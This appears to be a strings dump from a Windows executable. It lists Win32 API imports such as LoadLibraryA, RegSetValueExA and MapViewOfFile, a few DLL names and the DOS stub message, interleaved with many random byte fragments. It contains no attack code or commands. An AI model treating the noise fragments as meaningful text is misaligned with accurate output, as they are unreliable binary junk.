kzo\Qr
__l~4N
LCMapStringA
LCMapStringW
LeaveCriticalSection
,	Ln-K
LoadLibraryA
LoadLibraryW
lstrcmpA
lstrcmpW
lstrcpyA
MapViewOfFile
M/!EA&E
MessageBoxA
?)MH^v,
**M_oT
MSIMG32.dll
?\m<T+D1(
MultiByteToWideChar
oh;/\Q
ohY<{	D
o(o>.%
oT<h.h
OutputDebugStringA
PathAddBackslashA
P.h}j@
q&*!*P
Q\`}z7
RaiseException
`.rdata
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseSemaphore
ResetEvent
RtlUnwind
r;.!#Z
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetHandleCount
SetLastError
SetPriorityClass
SetStdHandle
SetUnhandledExceptionFilter
SHLWAPI.dll
\ sQ=E
/t*7oT
T9z=u9
tbf_a~
TerminateProcess
!This program cannot be run in DOS mode.
ThlFre
TK<_}=|
tLoK/6
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tL/~.Ye
TransmitCommChar
TransparentBlt
T?U6:@
ucD+PPD
UnhandledExceptionFilter
UnmapViewOfFile
USER32.dll
vTF.h2
WaitForSingleObject
WideCharToMultiByte
WriteFile
WritePrivateProfileStringA
wsprintfA
wsprintfW
w(	zNl
x7|7}f
x;I?~uv 
X|\k8g
XK\^t8
>}>X!kvM
xO5<m*
YJY;4T
y{O+99
yU8&5k
Z- 5o<
z?J[wb
ZMX;(|S